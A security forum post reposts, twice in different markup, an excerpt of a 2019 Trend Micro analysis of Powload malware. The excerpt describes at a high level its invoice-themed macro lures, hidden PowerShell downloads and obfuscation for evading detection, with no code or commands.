Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Malware Analysis
Powload Loads Up on Evasion Techniques (by Trend Micro)
Message
<blockquote data-quote="silversurfer" data-source="post: 823761" data-attributes="member: 26718"><p><em>Posted on:July 9, 2019, <strong>by Ian Mercado and Josefino Fajilago, </strong>Author:</em><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/author/trend-micro/" target="_blank"><em> Trend Micro</em></a></p><p></p><p>Powload gained notoriety <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/" target="_blank">as a catalyst for other malware</a>, a prominent example being Emotet, a banking trojan known for its modular capabilities. Powload has since remained a cybercrime staple due to its ability to combine simple infection methods with constantly evolving features — <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/" target="_blank">including capabilities intended for evading security technology</a>.</p><p></p><p>By sifting through six months’ worth of data (Jan-Jun 2019) covering over 50,000 samples from the Trend Micro™ Smart Protection Network™ infrastructure, we managed to gain insight into how Powload has incorporated new techniques to increase its effectiveness, especially in its ability to hide from detection. Here’s what we’ve learned.</p><p></p><p><span style="font-size: 15px"><strong>Powload in the wild</strong></span></p><p>A typical Powload attack uses social engineering techniques to get the user to click on an email attachment — for example, <a href="https://www.trendmicro.com/vinfo/kr/threat-encyclopedia/spam/3673/passwordprotected-zipped-file-spammed-to-deliver-powload-and-emotet" target="_blank">disguising the email as an invoice document</a> supposedly from a supplier. The Powload samples incidents we’ve observed often use attachments that contain a macro coded with Visual Basic for Attachments (VBA), which, when clicked, activates a hidden PowerShell process to download and execute the malware payload. Most Powload variants will often <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/" target="_blank">incorporate obfuscation techniques</a> to avoid hash-based detections.</p><p></p><p>While PowerShell scripts remain the most common method for downloading and executing the malware, the methods for tricking users into clicking the attachments and for hiding traces of the malware from security software are not always the same. We observed some basic techniques that range from using macro-enabled documents as social engineering lures to using hacking tools for obfuscation.</p><p></p><p></p><p>Continue reading below:</p><p>[URL unfurl="true"]https://blog.trendmicro.com/trendlabs-security-intelligence/powload-loads-up-on-evasion-techniques/[/URL]</p></blockquote><p></p>
[QUOTE="silversurfer, post: 823761, member: 26718"] [I]Posted on:July 9, 2019, [B]by Ian Mercado and Josefino Fajilago, [/B]Author:[/I][URL='https://blog.trendmicro.com/trendlabs-security-intelligence/author/trend-micro/'][I] Trend Micro[/I][/URL] Powload gained notoriety [URL='https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/']as a catalyst for other malware[/URL], a prominent example being Emotet, a banking trojan known for its modular capabilities. Powload has since remained a cybercrime staple due to its ability to combine simple infection methods with constantly evolving features — [URL='https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/']including capabilities intended for evading security technology[/URL]. By sifting through six months’ worth of data (Jan-Jun 2019) covering over 50,000 samples from the Trend Micro™ Smart Protection Network™ infrastructure, we managed to gain insight into how Powload has incorporated new techniques to increase its effectiveness, especially in its ability to hide from detection. Here’s what we’ve learned. [SIZE=4][B]Powload in the wild[/B][/SIZE] A typical Powload attack uses social engineering techniques to get the user to click on an email attachment — for example, [URL='https://www.trendmicro.com/vinfo/kr/threat-encyclopedia/spam/3673/passwordprotected-zipped-file-spammed-to-deliver-powload-and-emotet']disguising the email as an invoice document[/URL] supposedly from a supplier. The Powload samples incidents we’ve observed often use attachments that contain a macro coded with Visual Basic for Attachments (VBA), which, when clicked, activates a hidden PowerShell process to download and execute the malware payload. Most Powload variants will often [URL='https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/']incorporate obfuscation techniques[/URL] to avoid hash-based detections. While PowerShell scripts remain the most common method for downloading and executing the malware, the methods for tricking users into clicking the attachments and for hiding traces of the malware from security software are not always the same. We observed some basic techniques that range from using macro-enabled documents as social engineering lures to using hacking tools for obfuscation. Continue reading below: [URL unfurl="true"]https://blog.trendmicro.com/trendlabs-security-intelligence/powload-loads-up-on-evasion-techniques/[/URL] [/QUOTE]
Insert quotes…
Verification
Post reply
Top
